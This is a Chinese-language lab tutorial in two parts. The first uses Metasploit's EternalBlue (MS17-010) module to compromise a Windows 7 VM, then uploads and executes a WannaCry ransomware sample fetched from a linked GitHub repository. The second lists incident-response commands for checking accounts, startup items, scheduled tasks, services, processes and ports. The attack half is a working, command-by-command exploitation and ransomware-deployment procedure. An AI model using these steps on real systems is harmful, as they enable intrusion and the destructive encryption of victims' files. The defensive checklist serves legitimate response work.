利用永恒之蓝漏洞(ms17-010)对win7上传勒索病

攻击机kali：192.168.83.136

靶机win7：192.168.83.144

注意开始攻击前要设置快照

一、漏洞复现

1.启动msf

简介：

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点，讲解MSF框架的使用。

 msfconsole

2.搜索相关模块

永恒之蓝模块   命令：

search ms17-010

使用永恒之蓝攻击利用攻击模块

命令：  

use exploit/windows/smb/ms17_010_eternalblue

3.配置参数

命令：  

options

rhosts要求填写，目标主机的IP  192.168.83.144（靶机）

命令：

set rhosts 192.168.83.144

添加成功后再次options查看配置

4.开始攻击

命令：

run

开始利用漏洞模块攻击

获得目标主机权限

上面就是对msf17-010的使用，可以对win7进行操作

可以获取命令端口  shell

和其他的一些简单操作

后面的操作可以看这个师傅的

网络安全入门第一课—永恒之蓝（ms17-010）_ms17-010永恒之蓝-CSDN博客https://blog.csdn.net/m0_56088051/article/details/131682772?ops_request_misc=%7B%22request_id%22%3A%22171317287016777224471297%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=171317287016777224471297&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-131682772-null-null.142%5Ev100%5Epc_search_result_base5&utm_term=%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9Dms17-010&spm=1018.2226.3001.4187

5.上传病毒

病毒样本链接

GitHub - limiteci/WannaCry: this repository contains the active DOS/Windows ransomware, WannaCrythis repository contains the active DOS/Windows ransomware, WannaCry - limiteci/WannaCryhttps://github.com/limiteci/WannaCry

把病毒样本的其中两个文件放到一个文件夹中，我这里放到的是text文件夹中

上传病毒样本

命令：

upload /home/kali/Desktop/text/wcry.exe

命令：

pwd

查看上传路径

命令：

execute -f wcry.exe

执行wcry.exe

命令：

ps -ef | grep wcry.exe

查看是否执行成功

登录win7靶机查看到了病毒上传成功

下面的是执行成功的win7桌面

原本的文件内容被加密了

发现被勒索了

防护措施

首先关闭网络接着恢复快照    

二、应急响应--事件排查

1.判断勒索家族种类

一般被加密后加密文档都存在一定的后缀，可以将改后缀上传到国内的勒索病毒平台分析，会给出相关的样本家族，以及少部分会提供有解密方案，但是大多数情况下难以解决

网址：

安全卫士勒索病毒专题:文件恢复_安全卫士离线救灾版_文档卫士https://lesuobingdu.360.cn/

2.系统信息

//可以显示本地计算机的硬件资源、组件、软件环境、正在运行的任务、服务、系统驱动程序、加载模块、启动程序等。

C:\Users\test>msinfo32   //Microsoft系统信息工具：Msinfo32.exe

C:\Users\test>systeminfo //可查看主机名、操作系统等版本信息。

3.​​用户信息

攻击者入侵服务器后，可能会通过创建账号对服务器进行远程控制。常见的创建账号方法有：创建新账号、激活默认账号、建立隐藏账号（用户名后跟$的为隐藏账号）。

排查恶意账号的方法如下，如果存在恶意账号删除或者禁用：

C:\Users\test>net user    //查看所有用户，此方法无法查看隐藏用户

C:\Users\test>net user username    //查看指定用户信息

C:\Users\test>wmic useraccount get name,SID    //查看用户信息

C:\Users\test>lusrmgr.msc

4.启动项

启动项是系统开机时在前台或者后台运行的程序，攻击者有可能通过启动项使用病毒后门等实现持久化控制。
排查启动项的方法如下：

C:\Users\test>msconfig //命令行打开启动项

5.计划任务

查看计划任务属性，查看是否存在木马文件等。

C:\Users\test>taskschd.msc //获取计划任务信息

C:\Users\test>schtasks //获取计划任务信息（用户需是administrators组成员）

或直接打开计算机管理-->系统工具-->计划任务程序

6.服务自启动

//查看服务类型和启动状态，查看是否存在异常服务

C:\Users\test>services.msc

三、进程、端口排查

1、进程排查

主机在感染恶意程序时，都会启动相应进程来完成恶意操作。
排查方法如下：

C:\Users\test>msinfo32   软件环境-->正在运行任务

2.端口排查

主要对端口的连接情况进行检查，排查是否存在远程连接、可疑连接。检查方法如下：

//查看目前的网络连接，定位可疑的ESTABLISHED

C:\Users\test>netstat -ano   或。  C:\Users\test>netstat -anb（需要管理员权限）

//根据netstat定位出的pid，通过tasklist命令进行进程定位

C:\Users\test>tasklist | findstr pid

//查看端口对应的PID

C:\Users\test>netstat -ano ｜ findstr port